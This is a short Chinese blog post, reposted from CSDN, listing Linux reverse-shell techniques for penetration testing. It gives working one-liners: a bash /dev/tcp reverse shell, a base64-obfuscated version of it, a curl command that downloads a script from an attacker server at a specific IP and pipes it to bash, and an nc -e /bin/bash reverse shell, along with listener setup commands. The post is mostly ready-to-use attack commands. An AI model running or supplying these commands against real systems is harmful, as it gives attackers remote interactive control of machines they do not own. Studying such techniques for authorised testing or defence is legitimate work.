Linux下反弹shell

在渗透过程中,目标处于内网环境,或因为端口限制而我们无法直连目标机器,此时需要通过反弹shell来让目标机器主动连接我们获取一个交互式shell,以便继续深入。记录几个常用的。

bash反弹

1. 靶机上执行

bash -i >& /dev/tcp/xx.xx.xx/8000 0>&1

收到shell

2. 在特殊情况可以使用base64编码执行bash反弹shell

bash -c '{echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xNzIuMTYuMTAuMTA0LzgwMDAgIDA+JjE=}|{base64,-d}|{bash,-i}'

curl反弹

1. vps开启一个web服务,端口80。并编写index.html文件,内容包含bash一句话即可

python3 -m http.server 80vim index.htmlbash -i >& /dev/tcp/vps ip/port 0>&1

2. vps开启监听

nc -lvnp 6666

3. 靶机执行

curl 39.100.88.162/index.html|bash

成功接收反弹shell

nc反弹

nc -e /bin/bash 39.100.88.162 8000

#或者是/bin/sh都行

-e后面跟的参数代表的是在创建连接后执行的程序,这里代表在连接到远程后可以在远程执行一个本地shell(/bin/bash),也就是反弹一个shell给远程,可以看到远程已经成功反弹到了shell,并且可以执行命令。



原文链接:https://blog.csdn.net/qq_44159028/article/details/124318602

发表评论
留言与评论(共有 0 条评论) “”
   
验证码:

相关文章

推荐文章